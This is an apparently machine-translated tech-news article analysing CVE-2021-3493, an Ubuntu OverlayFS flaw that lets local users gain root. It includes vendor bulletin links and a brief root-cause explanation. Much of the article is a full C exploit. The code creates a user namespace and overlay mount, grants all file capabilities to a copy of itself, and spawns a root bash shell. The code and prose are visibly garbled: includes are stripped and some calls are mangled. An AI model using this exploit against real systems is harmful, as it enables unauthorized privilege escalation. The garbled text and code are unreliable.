Shulou(Shulou.com)06/01 Report--

This article mainly introduces the example analysis of OverlayFS loopholes leading to Ubuntu users to raise the rights of CVE-2021-3493, which has a certain reference value, interested friends can refer to, I hope you can learn a lot after reading this article, let the editor take you to know it.

Vulnerability summary

A Ubuntu-specific issue in the overlayfs file system in the Linux kernel in which it does not properly validate the application of file system functionality for user namespaces. Because Ubuntu comes with a patch that allows unprivileged overlayfs mounts, local attackers can use it to gain higher privileges.

CVE-2021-3493

The overlayfs implementation in the linux kernel does not properly validate the file function settings of the files in the underlying file system against the user namespace. Due to the combination of unprivileged user namespaces and patches included in the Ubuntu kernel that allow unprivileged override mounts, attackers can use it to gain elevated privileges, and the overlayfs implementation in the kernel does not properly validate the application of file system functionality in user namespaces. Local attackers can use it to gain higher privileges.

Affected version Ubuntu 20.10Ubuntu 20.04 LTSUbuntu 18.04 LTSUbuntu 16.04 LTSUbuntu 14.04 ESM vendor response

"We have issued a security bulletin on this issue at the following locations today

Https://ubuntu.com/security/notices/USN-4915-1

Https://ubuntu.com/security/notices/USN-4916-1

Https://ubuntu.com/security/notices/USN-4917- 1

And expose the problem in our CVE tracker:

Https://ubuntu.com/security/CVE-2021-3493

The following is the content of the message that was sent to the oss-security list:

Https://www.openwall.com/lists/oss-security/2021/04/16/1

Loophole analysis

Linux supports file capabilities storage in extended file properties, which act like setuid-bit, but can be more refined. The simplified process for setting up the file function using pseudo-code is as follows:

Setxattr (...): if cap_convert_nscap (...) Is not OK: then fail vfs_setxattr (...)

The important call is cap_convert_nscap, which checks for permissions about namespaces.

If we set up file functionality from our own namespaces and our own mounts, there is no problem, and we have the right to do so. The problem is that when OverlayFS forwards this operation to the underlying file system, it only calls vfs_setxattr and skips the check cap_convert_nscap in.

This allows arbitrary functionality to be set on files in external namespaces / mounts, which will also be applied during execution.

In Linux 5.11, the call to cap_convert_nscap has been moved into vfs_setxattr, so it is no longer vulnerable.

Vulnerability recurrence demo:

Exploit#define _ GNU_SOURCE#include # include / / # include / / # include int setxattr (const char * path, const char * name, const void * value, size_t size, int flags) # define DIR_BASE ". / ovlcap" # define DIR_WORK DIR_BASE "/ work" # define DIR_LOWER DIR_BASE "/ lower" # define DIR_UPPER DIR_BASE "/ upper" # define DIR_MERGE DIR_BASE "/ merge" # define BIN_MERGE DIR_MERGE "/ magic" # define BIN_UPPER DIR_UPPER "/ magic" static void xmkdir (const char * path, mode_t mode) {if (path (path Mode) =-1 & & errno! = EEXIST) err (1, "mkdir% s", path) } static void xwritefile (const char * path, const char * data) {int fd = open (path, O_WRONLY); if (fd =-1) err (1, "open% s", path); ssize_t len = (ssize_t) strlen (data); if (write (fd, data, len)! = len) err (1, "write% s", path); close (fd) } static void xcopyfile (const char * src, const char * dst, mode_t mode) {int fi, fo; if ((fi = open (src, O_RDONLY)) =-1) err (1, "open% s", src); if ((fo = open (dst, O_WRONLY | O_CREAT, mode) = =-1) err (1, "open% s", dst); char buf [4096]; ssize_t rd, wr; for ( ;) {rd = read (fi, buf, sizeof (buf)); if (rd = = 0) {break;} else if (rd = =-1) {if (errno = = EINTR) continue; err (1, "read% s", src);} char * p = buf While (rd > 0) {wr = write (fo, p, rd); if (wr = =-1) {if (errno = = EINTR) continue; err (1, "write% s", dst);} p + = wr; rd-= wr }} close (fi); close (fo);} static int exploit () {char buf [4096]; sprintf (buf, "rm-rf'% s Lancet", DIR_BASE); system (buf); xmkdir (DIR_BASE, 0777); xmkdir (DIR_WORK, 0777); xmkdir (DIR_LOWER, 0777); xmkdir (DIR_UPPER, 0777); xmkdir (DIR_MERGE, 0777) Uid_t uid = getuid (); gid_t gid = getgid (); if (unshare (CLONE_NEWNS | CLONE_NEWUSER) = =-1) err (1, "unshare"); xwritefile ("/ proc/self/setgroups", "deny"); sprintf (buf, "0% D1", uid); xwritefile ("/ proc/self/uid_map", buf); sprintf (buf, "0% D1", gid) Xwritefile ("/ proc/self/gid_map", buf); sprintf (buf, "lowerdir=%s,upperdir=%s,workdir=%s", DIR_LOWER, DIR_UPPER, DIR_WORK); if (mount ("overlay", DIR_MERGE, "overlay", 0, buf) =-1) err (1, "mount% s", DIR_MERGE) / / all+ep char cap [] = "\ X01\ X00\ X00\ X02\ xff\ X00\ X00\ xff\ x00\ x00"; xcopyfile ("/ proc/self/exe", BIN_MERGE, 0777); if (setxattr (BIN_MERGE, "security.capability", cap, sizeof (cap)-1,0) =-1) err (1, "setxattr% s", BIN_MERGE); return 0 } int main (int argc, char * argv []) {if (strstr (argv [0], "magic") | (argc > 1 & &! strcmp (argv [1], "shell")) {setuid (0); setgid (0); execl ("/ bin/bash", "/ bin/bash", "- norc", "--noprofile", "- I", NULL) Err (1, "execl / bin/bash");} pid_t child = fork (); if (child = =-1) err (1, "fork"); if (child = = 0) {_ exit (exploit ());} else {waitpid (child, NULL, 0);} execl (BIN_UPPER, BIN_UPPER, "shell", NULL) Err (1, "execl% s", BIN_UPPER);}

Thank you for reading this article carefully. I hope the article "example Analysis of OverlayFS loopholes leading to Ubuntu user Rights Enhancement CVE-2021-3493" shared by the editor will be helpful to everyone. At the same time, I also hope that you will support us and pay attention to the industry information channel. More related knowledge is waiting for you to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.